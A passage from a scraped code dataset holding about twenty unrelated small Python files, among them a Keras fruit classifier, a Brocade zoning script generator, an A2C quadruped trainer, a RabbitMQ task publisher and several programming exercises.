manifest_path = os.path.join(dirpath, \"set.json\")\n manifest_data[\"manifest_path\"] = manifest_path\n\n with open(manifest_path, 'w') as manifest_file:\n json.dump(manifest_data, manifest_file, indent=1)\n sys.stdout.close()\n return set_tag, manifest_data\n\n\n\n\nif __name__ == '__main__':\n\n if not EXPORT_SOUND:\n print(\"hsnd2wav is not built! I need this to export sound.\")\n print(\"build it with `make hsnd2wav`\")\n exit(1)\n\n if not WAV2OGG:\n print(\"I need libsndfile available to convert WAV to OGG.\")\n print(\"Install libsndfile and make sure sndfile-convert is on your PATH\")\n\n ldir = \"levels\"\n\n avara_r = os.path.join(\"levels\", \"single-player.r\")\n data = open(avara_r, 'rb').read()\n\n reader = resource.Reader()\n avara_rsrc = reader.parse(data)\n avara_tmpl = avara_rsrc['TMPL']\n\n sys.stdout = open(\"rsrc2files.log\", \"w\")\n if len(sys.argv) > 1:\n parse_level_rsrc(Path(sys.argv[1]), ldir, avara_tmpl)\n else:\n # run against everything in levels\n # and store them alongside\n manifest = {}\n for rsrc_file in os.listdir(ldir):\n rpath = os.path.join(ldir, rsrc_file)\n if DEBUG_EXPORT:\n print(rpath)\n if os.path.isdir(rpath):\n continue\n if not str(rpath).endswith(\".r\"):\n continue\n tag, manifest_data = parse_level_rsrc(Path(rpath), ldir, avara_tmpl)\n sys.stdout = open(\"rsrc2files.log\", \"a\")\n if not tag:\n print(f\"Couldn't read {rpath}\")\n continue\n manifest[tag] = manifest_data[\"manifest_path\"]\n\n manifest_path = os.path.join(ldir, \"manifest.json\")\n with open(manifest_path, 'w') as manifest_file:\n json.dump(manifest, manifest_file, indent=1)","sub_path":"bin/rsrc2files.py","file_name":"rsrc2files.py","file_ext":"py","file_size_in_byte":7796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"115423361","text":"#from Waterloo's CCC Contest:\r\ndef arrivaltime(a):\r\n x = a.split(\":\")\r\n hourmin = []\r\n for each in x:\r\n p = int(each)\r\n hourmin.append(p)\r\n 
print(hourmin)\r\n if hourmin[0] not in range(7,11) and hourmin[0] not in range(15,20) and hourmin[0]+2 not in range(8,11) and hourmin[0]+2 not in range(16,20):\r\n arrival_hrs = hourmin[0]+2\r\n if hourmin[1] == 0:\r\n print(str(arrival_hrs) + \":\" + str(hourmin[1]) + \"0\")\r\n elif hourmin[0]+2 == 7 or hourmin[0]+2 == 15 and hourmin[1] > 0:\r\n if hourmin[1]*2 < 60:\r\n print(str(arrival_hrs) + \":\" + str(hourmin[1]*2))\r\n else:\r\n d = arrival_hrs+1\r\n e = hourmin[1]*2-60\r\n print(str(d) + \":\" + str(e))\r\n else:\r\n print(str(arrival_hrs) + \":\" + str(hourmin[1]))\r\n else:\r\n arrivaltim = hourmin[0]+4\r\n if hourmin[0] == 15 and hourmin[1] == 0:\r\n print(str(arrivaltim) + \":\" + str(hourmin[1]) + \"0\")\r\n elif hourmin[0] == 15 and hourmin[1]*2 < 60:\r\n print(str(arrivaltim) + \":\" + str(hourmin[1]*2))\r\n elif hourmin[0] == 15 and hourmin[1]*2 > 60:\r\n d = arrivaltim+1\r\n e = hourmin[2]*2-60\r\n print(str(d) + \":\" + str(e))\r\n\r\n \r\n\r\narrivaltime(\"07:00\")\r\n","sub_path":"2016j4arrivaltime.py","file_name":"2016j4arrivaltime.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226863299","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport os\nfrom keras.models import load_model \nfrom keras.preprocessing import image\nimport matplotlib.pyplot as plt\n\n#import global variables\nimg_path = input(\"[INPUT] image path >>> \")\ntrain_path = 'dataset/train'\n#import pretrained model from hdf5 file\nmodel = load_model('mobilenet_finetuned.hdf5')\n\n\ndef load_image(img_path, show=False):\n\n img = image.load_img(img_path, target_size=(150, 150))\n img_tensor = image.img_to_array(img) # (height, width, channels)\n img_tensor = np.expand_dims(img_tensor, axis=0) # (1, height, width, channels), add a dimension because the model expects this shape: (batch_size, height, width, channels)\n img_tensor /= 255. 
# imshow expects values in the range [0, 1]\n if show:\n plt.imshow(img_tensor[0]) \n plt.axis('off')\n plt.show()\n return img_tensor\n\n\n\n\ndef run():\n new_image = load_image(img_path)\n #create list of training lables\n # train_labels = os.listdir(train_path)\n train_labels = ['سیب', 'موز', 'انبه', 'پرتقال', 'توت فرنگی']\n # sort the training labels\n # train_labels.sort()\n preds = model.predict(new_image)\n pred_lable , pred_percent = preds.argmax(),preds.max()\n prediction = train_labels[pred_lable]\n return prediction,pred_percent\n\nif __name__ == '__main__':\n prediction , percent = run()\n print( prediction ,': ', str(percent*100),'%')\n","sub_path":"run-test.py","file_name":"run-test.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231251034","text":"import os\nimport tqdm\nimport pickle\nimport argparse\nimport numpy as np\nfrom pathlib import Path\n\nfrom parakeet.datasets import LJSpeechMetaData\nfrom parakeet.audio import AudioProcessor, LogMagnitude\nfrom parakeet.frontend import English\n\nfrom config import get_cfg_defaults\n\ndef create_dataset(config, source_path, target_path, verbose=False):\n # create output dir\n target_path = Path(target_path).expanduser()\n mel_path = target_path / \"mel\"\n os.makedirs(mel_path, exist_ok=True)\n\n meta_data = LJSpeechMetaData(source_path)\n frontend = English()\n processor = AudioProcessor(\n sample_rate=config.data.sample_rate,\n n_fft=config.data.n_fft,\n n_mels=config.data.d_mel,\n win_length=config.data.win_length, \n hop_length=config.data.hop_length,\n f_max=config.data.f_max)\n normalizer = LogMagnitude()\n \n records = []\n for (fname, text, _) in tqdm.tqdm(meta_data):\n wav = processor.read_wav(fname)\n mel = processor.mel_spectrogram(wav)\n mel = normalizer.transform(mel)\n phonemes = frontend.phoneticize(text)\n ids = frontend.numericalize(phonemes)\n mel_name = 
os.path.splitext(os.path.basename(fname))[0]\n\n # save mel spectrogram\n records.append((mel_name, text, phonemes, ids))\n np.save(mel_path / mel_name, mel)\n if verbose:\n print(\"save mel spectrograms into {}\".format(mel_path))\n \n # save meta data as pickle archive\n with open(target_path / \"metadata.pkl\", 'wb') as f:\n pickle.dump(records, f)\n if verbose:\n print(\"saved metadata into {}\".format(target_path / \"metadata.pkl\"))\n\n # also save meta data into text format for inspection\n with open(target_path / \"metadata.txt\", 'wt') as f:\n for mel_name, text, phonemes, _ in records:\n phoneme_str = \"|\".join(phonemes)\n f.write(\"{}\\t{}\\t{}\\n\".format(mel_name, text, phoneme_str))\n if verbose:\n print(\"saved metadata into {}\".format(target_path / \"metadata.txt\"))\n \n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"create dataset\")\n parser.add_argument(\"--config\", type=str, metavar=\"FILE\", help=\"extra config to overwrite the default config\")\n parser.add_argument(\"--input\", type=str, help=\"path of the ljspeech dataset\")\n parser.add_argument(\"--output\", type=str, help=\"path to save output dataset\")\n parser.add_argument(\"--opts\", nargs=argparse.REMAINDER,\n help=\"options to overwrite --config file and the default config, passing in KEY VALUE pairs\"\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"print msg\")\n \n config = get_cfg_defaults()\n args = parser.parse_args()\n if args.config:\n config.merge_from_file(args.config)\n if args.opts:\n config.merge_from_list(args.opts)\n config.freeze()\n print(config.data)\n\n create_dataset(config, args.input, args.output, args.verbose)\n","sub_path":"transformer_tts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565520120","text":"from random import randint, 
choice\nfrom string import ascii_letters, digits\n\nCODEPOOL = ascii_letters + digits\n\n\ndef activate_key_generator(num, length=10):\n with open('key.txt', 'w') as f:\n for i in range(num):\n s = [choice(CODEPOOL) for i in range(length)]\n f.write(''.join(s) + '\\n')\n f.close()\n\n\nif __name__ == '__main__':\n activate_key_generator(200, 10)\n","sub_path":"activatekey.py","file_name":"activatekey.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469859134","text":"from PIL import Image\nimport numpy as np\nimport pandas as pd\n\nfilename = './me.jpeg'\nim = Image.open(filename)\nwidth, height= im.size\nLim = im.convert('L')\n\nLim = Lim.resize([130, 100]) \n\nthreshold = 180\ntable = []\nfor i in range(256):\n if i < threshold:\n table.append(0)\n else:\n table.append(1)\n\nbim = Lim.point(table, '1')\n\n#得到二值图矩形\ntest = bim.getdata()\ntest1 = np.array(test)\ntest1 = test1.reshape((100, 130))\n\npd.DataFrame(test1).to_csv('./lin.csv', index=None, header=None)","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326476556","text":"#/usr/env python3\n#coding:utf-8\n\nimport re\nimport os\n\n\ndef validate_wwn(wwn):\n#确认单个端口或是单个wwn号格式是否正确\n if len(wwn) == 16 and re.match(r'^\\w{16}',wwn):\n return 'wwn_no_colon'\n elif len(wwn) == 23 and re.match(r'^\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}:\\w{2}',wwn):\n return 'wwn_colon'\n elif re.match(r'^\\d+,\\d+',wwn):\n return 'wwn_port_comma'\n elif len(wwn) == 0:\n return 'no_alias'\n else:\n return False\n\n\n\ndef format_wwn(wwn):\n#转换WWN号从大写16格式(10000000C96E2898)或是大写(10:00:00:00:C9:6E:28:98)\n#转换马Brocade光纤交换机格式小写冒号格式(10:00:00:00:c9:6e:28:98)\n\n if wwn.isupper():\n wwn = wwn.lower()\n\n line = wwn[0:2]\n a = int('2')\n b = ''\n for i in (4,6,8,10,12,14,16):\n b = int(i)\n ll = 
wwn[int(a):int(b)]\n a = b\n line = line + ':' + ll\n return (line)\n\n\ndef create_brocade_alias(member_alias):\n #生成Brocade别名脚本\n alias_shell_list = []\n #print('create_brocade_alias',member_1)\n for i in member_alias:\n if len(member_alias[i]) != 0:\n if validate_wwn(member_alias[i]) == 'wwn_no_colon':\n member_alias[i] = format_wwn(member_alias[i])\n tmp_line = \"alicreate %s,\\\"%s\\\"\" % (i,member_alias[i])\n alias_shell_list.append(tmp_line)\n return alias_shell_list\n\n\n\n\n\ndef create_brocade_shell(member_1,member_2,cfg_name,zone_type):\n #生成Brocade脚本\n\n zone_shell_list = []\n cfg_shell_list = []\n Brocade_member_1 = member_1\n Brocade_member_2 = member_2\n Brocade_cfg_name = cfg_name\n Brocade_zone_type = zone_type\n if Brocade_zone_type == 'on':\n for i in Brocade_member_1:\n for j in Brocade_member_2:\n zone_1ine = \"zonecreate \\\"%s_%s\\\",\\\"%s;%s\\\"\" % (i,j,i,j)\n zone_shell_list.append(zone_1ine)\n cfg_line = \"cfgadd %s,\\\"%s_%s\\\"\" % (Brocade_cfg_name,i,j)\n cfg_shell_list.append(cfg_line)\n zone_shell_list.extend(cfg_shell_list)\n return zone_shell_list\n else:\n tmp_zip = zip(Brocade_member_1,Brocade_member_2)\n for i in tmp_zip:\n zone_1ine = \"zonecreate \\\"%s_%s\\\",\\\"%s;%s\\\"\" % (i[0], i[1],i[0], i[1])\n zone_shell_list.append(zone_1ine)\n cfg_line = \"cfgadd %s,\\\"%s_%s\\\"\" % (Brocade_cfg_name, i[0], i[1])\n cfg_shell_list.append(cfg_line)\n zone_shell_list.extend(cfg_shell_list)\n return zone_shell_list\n\n\n\n\n\n\n\n\ndef format_member_list(member_list):\n#处理Member-1和Member-2中的host1;wwn格式数据,例如:\n# test01_fcs0;10000000C96E2898\n# test01_fcs1;10:00:00:00:C9:6E:28:98\n# test02_fcs0;10000000C96E2898\n# test02_fcs1;1,12\n# test03_fcs0;2,34\n# test04_fcs0;10000000C96E2898\n# 返回对应的字典数据\n# {\n# 'test01_fcs0':'10000000C96E2898',\n# 'test01_fcs1':'10:00:00:00:C9:6E:28:98',\n# 'test02_fcs0':'10000000C96E2898',\n# 'test01_fcs0':'1,12',\n# 'test02_fcs1':'10000000C96E2898',\n# }\n lists_member = {}\n # 
print('member_list',member_list)\n # if os.name == 'nt':\n # lists = member_list.split('\\n')\n # else:\n #\n lists = member_list.split('\\n')\n\n\n # print('lists', lists)\n for line in lists:\n l = line.split(';')\n lists_member[l[0]] = l[1]\n return lists_member","sub_path":"htw_tools/Brocade_zone_tool/fabric_sub.py","file_name":"fabric_sub.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"511253626","text":"n = int(input())\n\nfor _ in range(n):\n data = list(input())\n stack = []\n\n while data:\n x = data.pop(0)\n\n if x == ')' and stack and stack[-1] == '(':\n stack.pop()\n else:\n stack.append(x)\n \n\n if stack:\n print('NO')\n else:\n print('YES')\n\n######################################################################\n\nfor _ in range(n):\n data = list(input())\n sum_ = 0\n\n for s in data:\n if s == '(':\n sum_ += 1\n else:\n sum_ -= 1\n\n if sum_ < 0:\n print('NO')\n break\n\n if sum_:\n print('NO')\n else:\n print('YES')\n","sub_path":"baekjoon/data-structure/9012.py","file_name":"9012.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"284033327","text":"#/usr/bin/env python3\nfrom __future__ import print_function\nfrom quadruped_env import QuadrupedEnvironment\nfrom a2c import A2C\nimport numpy as np\n\nenv = QuadrupedEnvironment() #functions - init, jsp_callback, normalize_js, imu_sub_callback\n # reset, step, \nstate_shape = env.state_shape[0] #this returns tuple (34,) so we need to get only the first int\naction_shape = env.action_shape[0] #this needs to be indexed too; same case as above\nagent = A2C(state_shape,action_shape,actor_lr=0.001, critic_lr=0.001, gamma=0.99)\n\nprint('A2C agent configured') \nmax_episode = 10000\ntot_rewards = []\nprint('env reset')\nprint(\"\\n*************************\")\n\nobservation, done = env.reset() #gazebo reset + 
states are 0 + join states are set to default\nprint(\"\\n**********************\")\nprint(\"obs, done? \",observation, done)\nprint(\"\\n***********************\")\naction = agent.select_action(observation) # a random int action is taken, with prob = action_probs\nprint(\"Action after select_action(): \",action)\nprint(\"\\n*********************\")\nobservation, reward, done = env.step(action)\n\nnoise_sigma = 0.1\nsave_cutoff = 1\ncutoff_count = 0\nsave_count = 0\n\ncurr_highest_eps_reward = -1000.0\nfor i in range(max_episode):\n if i % 100 == 0 and noise_sigma>0.03:\n agent.noise = 0.05 #constant noise for now \n noise_sigma /= 2.0\n step_num = 0\n while done == False:\n step_num += 1\n state_val = env.step(action)[0]\n action_final = agent.select_action(state_val)\n print(\"Action after reset \",action_final)\n print(\"\\n*********************\")\n observation, reward, done = env.step(action_final[0])\n print('reward:',reward,'episode:', i, 'step:',step_num,'curr high eps reward:',curr_highest_eps_reward, 'saved:',save_count, 'cutoff count:', cutoff_count)\n action, eps_reward = env.step(action)\n tot_rewards.append(eps_reward)\n if eps_reward > curr_highest_eps_reward:\n cutoff_count += 1\n curr_highest_eps_reward = eps_reward\n if cutoff_count >= save_cutoff:\n save_count += 1\n print('saving_model at episode:',i)\n agent.save_model()\n agent.save_memory()\n cutoff_count = 0\n observation, done = env.reset()\nnp.save('eps_rewards',tot_rewards)\n\nimport matplotlib.pyplot as plt\nplt.plot(tot_rewards)\n","sub_path":"src/a2c/quadruped_learn.py","file_name":"quadruped_learn.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399050948","text":"class GraphNode:\n def __init__(self, value):\n self.value = value\n self.adjacent = []\n\n def __repr__(self):\n return f'Node: {self.value}'\n\n\nn1 = GraphNode(1)\nn2 = GraphNode(2)\nn3 = GraphNode(3)\nn4 = GraphNode(4)\nn5 
= GraphNode(5)\n\nn1.adjacent.extend([n2, n3, n4])\nn2.adjacent.extend([n1, n3, n4])\nn3.adjacent.extend([n1, n2, n4])\nn4.adjacent.extend([n1, n2, n3])\n\n\ndef findNode(node, target):\n toVisit = [node]\n seen = set([])\n print(seen)\n while toVisit:\n curr = toVisit.pop()\n print(curr)\n if curr == target:\n return True\n seen.add(curr)\n toVisit.extend(list(set(curr.adjacent) - seen))\n return False\n\n\nprint('Expected: True Got: ', findNode(n1, n4))\nprint('Expect: False Got:', findNode(n1, n5))\n","sub_path":"Graphs/tofindNode.py","file_name":"tofindNode.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240729209","text":"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport functions\nimport config\nimport os.path\nimport tensorflow.keras\nimport csv\nimport matplotlib.image as mpimg\n\ncenter_images=[]\nsteering_angles=[]\nthrottle_positions=[]\nbrake_positions=[]\nspeed_values=[]\nif (os.path.isfile(config.images_pickle) and os.path.isfile(config.images_pickle)) and (not config.force_dataset_reload):\n images_file=open(config.images_pickle,'rb')\n labels_file=open(config.labels_pickle,'rb')\n images=np.load(images_file)\n steering_angles=np.load(labels_file)\n print (\"Loaded dataset from files\",config.images_pickle,\" ,\",config.labels_pickle)\n print(\"Dataset of \", images.shape[0], \"x\", images[0].shape, \"dtype=\", images.dtype, \" images\")\n images_file.close()\n labels_file.close()\nelse:\n with open(config.filepath+config.filename, newline='') as csvfile:\n reader = csv.reader(csvfile)\n header=reader.__next__()\n if header!=config.expected_header:\n raise Exception(\"Unexpected header in data file \", config.filename)\n zero_steering_frames=0\n for row in reader:\n angle=float(row[3])\n if angle!=0:#discarding all zero angle images\n center_images.append(config.filepath+row[0])\n steering_angles.append(angle)\n 
throttle_positions.append(float(row[4]))\n brake_positions.append(float(row[5]))\n speed_values.append(float(row[6]))\n else:\n zero_steering_frames += 1\n if zero_steering_frames <2> <3> <4> <5>\n# a/1 modified: X X\n# Lock a/1 with pos 4, 5: OK\n# Lock a/1 with pos 3, 2, ..: not OK\n# Lock a/1 with pos P: Exists an event with pos>P -> not OK\n\n\n@service_as_factory\nclass SqlOccLockerBackendService:\n connection: ConnectionHandler\n\n def assert_fqid_positions(self, fqids: Dict[str, int]) -> None:\n if not fqids:\n return\n\n query_arguments: List[Any] = []\n filter_parts = []\n for fqid, position in fqids.items():\n query_arguments.extend((fqid, position,))\n filter_parts.append(\"(fqid=%s and position>%s)\")\n query = (\n \"select fqid from events where \" + \" or \".join(filter_parts) + \" limit 1\"\n )\n\n self.raise_model_locked_if_match(query, query_arguments)\n\n def assert_fqfield_positions(self, fqfields: Dict[str, int]) -> None:\n if not fqfields:\n return\n\n event_query_arguments: List[Any] = []\n event_filter_parts = []\n collectionfield_query_arguments: List[str] = []\n collectionfield_filter_parts = []\n\n for fqfield, position in fqfields.items():\n collectionfield, fqid = collectionfield_and_fqid_from_fqfield(fqfield)\n\n event_query_arguments.extend((fqid, position,))\n event_filter_parts.append(\"(fqid=%s and position>%s)\")\n\n collectionfield = collectionfield.replace(\"_\", r\"\\_\")\n collectionfield = collectionfield.replace(\"$\", \"_%\")\n\n collectionfield_query_arguments.extend((fqid, collectionfield,))\n collectionfield_filter_parts.append(\n \"(e.fqid=%s and cf.collectionfield LIKE %s)\"\n )\n\n event_filter = \" or \".join(event_filter_parts)\n collectionfield_filter = \" or \".join(collectionfield_filter_parts)\n query = dedent(\n f\"\"\"\\\n select e.fqid from (\n select id, fqid from events where {event_filter}\n ) e\n inner join events_to_collectionfields ecf on e.id=ecf.event_id\n inner join collectionfields cf on 
ecf.collectionfield_id=cf.id\n where {collectionfield_filter} limit 1\"\"\"\n )\n query_arguments = event_query_arguments + collectionfield_query_arguments\n\n self.raise_model_locked_if_match(query, query_arguments)\n\n def assert_collectionfield_positions(\n self, collectionfields: Dict[str, int]\n ) -> None:\n if not collectionfields:\n return\n\n query_arguments: List[Any] = []\n filter_parts = []\n for collectionfield, position in collectionfields.items():\n query_arguments.extend((collectionfield, position,))\n filter_parts.append(\"(collectionfield=%s and position>%s)\")\n query = (\n \"select collectionfield from collectionfields where \"\n + \" or \".join(filter_parts)\n + \" limit 1\"\n )\n\n self.raise_model_locked_if_match(query, query_arguments)\n\n def raise_model_locked_if_match(self, query, arguments):\n \"\"\" returns str (the only response) or None if there is no row \"\"\"\n locked_key = self.connection.query_single_value(query, arguments)\n if locked_key is not None:\n raise ModelLocked(locked_key)\n","sub_path":"writer/writer/postgresql_backend/sql_occ_locker_backend_service.py","file_name":"sql_occ_locker_backend_service.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26697147","text":"import json\r\nfrom channels.generic.websocket import AsyncWebsocketConsumer\r\nfrom asgiref.sync import async_to_sync\r\n\r\nclass ChatConsumer(AsyncWebsocketConsumer):\r\n async def connect(self):\r\n self.room_group_name = 'ops_coffee'\r\n\r\n # Join room group\r\n await self.channel_layer.group_add(\r\n self.room_group_name,\r\n self.channel_name\r\n )\r\n\r\n await self.accept()\r\n\r\n async def disconnect(self, close_code):\r\n # Leave room group\r\n await self.channel_layer.group_discard(\r\n self.room_group_name,\r\n self.channel_name\r\n )\r\n\r\n # Receive message from WebSocket\r\n async def receive(self, text_data):\r\n text_data_json = 
json.loads(text_data)\r\n print(type(text_data_json),4)\r\n message = text_data_json['message']\r\n print(message,4444)\r\n\r\n # Send message to room group\r\n await self.channel_layer.group_send(\r\n self.room_group_name,\r\n {\r\n 'type': 'chat_message',\r\n 'message': message\r\n }\r\n )\r\n\r\n # Receive message from room group\r\n async def chat_message(self, event):\r\n message = '新订单提醒'\r\n # Send message to WebSocket\r\n await self.send(text_data=json.dumps({\r\n 'message': message,\r\n }))\r\n\r\nfrom channels.layers import get_channel_layer\r\ndef push():\r\n channel_layer = get_channel_layer()\r\n async_to_sync(channel_layer.group_send)(\r\n 'ops_coffee',\r\n {\r\n \"type\":\"chat.message\",\r\n }\r\n )","sub_path":"diancan_backen/account/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"24098903","text":"# downloaded from: https://github.com/Miffyli/im2latex-dataset\n\nimport re\nimport random \nimport argparse\n\n# regexp used to tokenize formula\n# Pattern /[$-/:-?{-~!\"^_`\\[\\]]/ was taken from:\n# http://stackoverflow.com/questions/8359566/regex-to-match-symbols\nTOKENIZE_PATTERN = re.compile(\"(\\\\\\\\[a-zA-Z]+)|\"+ # \\[command name]\n #\"(\\{\\w+?\\})|\"+ # {[text-here]} Check if this is needed\n \"((\\\\\\\\)*[$-/:-?{-~!\\\"^_`\\[\\]])|\"+ # math symbols\n \"(\\w)|\"+ # single letters or other chars\n \"(\\\\\\\\)\") # \\ characters\n\n# regexps for removing \"invisible\" parts\n# First item is regexp for searching, second is string/func used to replace\nINVISIBLE_PATTERNS = [[re.compile(\"(\\\\\\\\label{.*?})\"), \"\"],\n [re.compile(\"(\\$)\"), \"\"],\n [re.compile(\"(\\\\\\>)\"), \"\"],\n [re.compile(\"(\\\\\\~)\"), \"\"],\n ]\n\n# regexps for normalizing\n# First item is regexp for searching, second is string/func used to replace\nNORMALIZE_PATTERNS = [[re.compile(\"\\{\\\\\\\\rm (.*?)\\}\"), \n lambda x: 
\"\\\\mathrm{\"+x.group(1)+\"}\"],\n [re.compile(\"\\\\\\\\rm{(.*?)\\}\"), \n lambda x: \"\\\\mathrm{\"+x.group(1)+\"}\"],\n [re.compile(\"SSSSSS\"), \"$\"],\n [re.compile(\" S S S S S S\"), \"$\"],\n ]\n \n\ndef tokenize_formula(formula):\n \"\"\"Returns list of tokens in given formula.\n formula - string containing the LaTeX formula to be tokenized\n Note: Somewhat work-in-progress\"\"\"\n # Tokenize\n tokens = re.finditer(TOKENIZE_PATTERN, formula)\n # To list\n tokens = list(map(lambda x: x.group(0), tokens))\n # Clean up\n tokens = [x for x in tokens if x is not None and x != \"\"]\n return tokens\n\ndef remove_invisible(formula):\n \"\"\"Removes 'invisible' parts of the formula.\n Invisible part of formula is part that doesn't change rendered picture, \n eg. \\label{...} doesn't change the visual output of formula \n formula -- formula string to be processed \n Returns processed formula\n Note: Somewhat work-in-progress\"\"\"\n for regexp in INVISIBLE_PATTERNS:\n formula = re.sub(regexp[0], regexp[1], formula)\n return formula\n \ndef normalize_formula(formula):\n \"\"\"Normalize given formula string.\n Normalisation attempts to eliminate multiple different ways of writing\n same thing. Eg. 
'x^2_3' results to same output as 'x_3^2', and normalisation\n would turn all of these to same form\n formula -- formula string to be normalised\n Returns processed formula\n Note: Somewhat work-in-progress\"\"\"\n for regexp in NORMALIZE_PATTERNS:\n formula = re.sub(regexp[0], regexp[1], formula)\n return formula","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"425360480","text":"#!/usr/bin/env python3\nimport pika, json, logging\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(filename)s:%(lineno)d: %(message)s\")\n\nlog = logging.getLogger('IdentityCardTransmitter')\n\nlog.debug('connecting to message-broker')\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters('localhost'))\n\n\nlog.debug('declaring queues')\nchannel = connection.channel()\nchannel.queue_declare(queue='opticoms.transmit', durable=True)\nresponse_queue = channel.queue_declare(exclusive=True).method.queue\n\n\ntargetDevices = ['10.6.100.107','10.6.100.108','10.6.100.109',]\nidentitycardList = [\n {'ID': '0030074700811', 'Name': 'Peter Körner'},\n {'ID': '0030074229747', 'Name': 'Dennis Sepeur'}\n]\n\n\nlog.info('publishing %d transmission-tasks with %d identity-cards each',\n len(targetDevices), len(identitycardList))\n\nfor targetDevice in targetDevices:\n body = {\n 'targetDevice': targetDevice,\n 'identitycardList': identitycardList,\n 'retryCount': 3,\n }\n\n log.info('issuing task for: %s', body['targetDevice'])\n channel.basic_publish(exchange='',\n routing_key='opticoms.transmit',\n properties=pika.BasicProperties(\n delivery_mode=2, # make message persistent\n reply_to=response_queue,\n correlation_id=targetDevice,\n content_type='application/json',\n ),\n body=json.dumps(body))\n\ndef handle_response(ch, method, properties, body):\n body = json.loads(body.decode('utf8'))\n\n if body['success']:\n log.info(\"received 
success-response for %s\",\n body['targetDevice'])\n targetDevices.remove(body['targetDevice'])\n\n elif 'retryCount' in body and body['retryCount'] > 0:\n log.info(\"received non-final fail-response for %s, %d tries remaining\",\n body['targetDevice'],\n body['retryCount'])\n\n else:\n log.info(\"received final fail-response for %s\",\n body['targetDevice'])\n targetDevices.remove(body['targetDevice'])\n\n\n if len(targetDevices) == 0:\n channel.stop_consuming()\n\n\nlog.debug('setting up consumer')\nchannel.basic_consume(handle_response,\n queue=response_queue,\n no_ack=True)\n\nlog.debug('start consuming')\nchannel.start_consuming()\n\nlog.debug('closing connection')\nconnection.close()\n","sub_path":"examples/queue/transmit-and-wait-for-response.py","file_name":"transmit-and-wait-for-response.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620370152","text":"from . import GPIBBase\n\n\nclass RacalDana1991(GPIBBase):\n \"\"\"\n Interface to Racal-Dana 1991 Frequency Counter. \n \n This class supports context management:\n\n .. code::\n\n with RacalDana1991('GPIB::17') as freq_counter:\n pass\n\n Parameters\n ----------\n addr : str\n Instrument address, e.g. 
'GPIB::15'\n kwargs\n Keyword arguments are passed to the pyvisa.ResourceManager.open_resource\n method.\n \"\"\"\n\n def __init__(self, addr, **kwargs):\n kwargs[\"read_termination\"] = \"\\r\"\n super().__init__(addr, **kwargs)\n\n self.write(\"FA\")\n self.write(\"T0\")\n\n def frequency(self):\n \"\"\"\n Return the frequency value.\n\n Returns\n -------\n frequency : float\n \"\"\"\n raw = self.read()\n return float(raw.replace(\"FA\", \"\"))\n","sub_path":"uedinst/freq_counter.py","file_name":"freq_counter.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321368256","text":"def counting_sort(A, B, k):\n C = [0 for i in range(k+1)]\n # C[i] に i の出現数を記録する\n for j in range(len(A)):\n C[A[j]] += 1\n # C[i] に i 以下の数の出現数を記録する\n for i in range(1, k+1):\n C[i] += C[i-1]\n for j in range(len(A)-1, -1, -1):\n B[C[A[j]]-1] = A[j]\n C[A[j]] -= 1\n\nif __name__ == '__main__':\n n = int(input())\n A = [int(i) for i in input().split()]\n B = [0 for i in range(n)]\n counting_sort(A, B, max(A))\n print(\" \".join(map(str,B)))","sub_path":"ALDS1_06_A.py","file_name":"ALDS1_06_A.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84849257","text":"# Write a guessing game where the user has to guess a secret number.\n\nx=53\ntries=1\nguess = int(input(\"type in a number: \"))\nwhile guess!=x :\n if guess>x :\n print(\"The number you typed is higher\")\n else:\n print(\"The number you typed is lower\")\n old=guess\n guess = int(input(\"type in a number: \"))\n if guess!=old : tries+=1\nprint(\"You got it on the first try!\") if tries==1 else print(\"You made it in \"+str(tries)+\" tries\")\n\n","sub_path":"SPP/ex09.py","file_name":"ex09.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
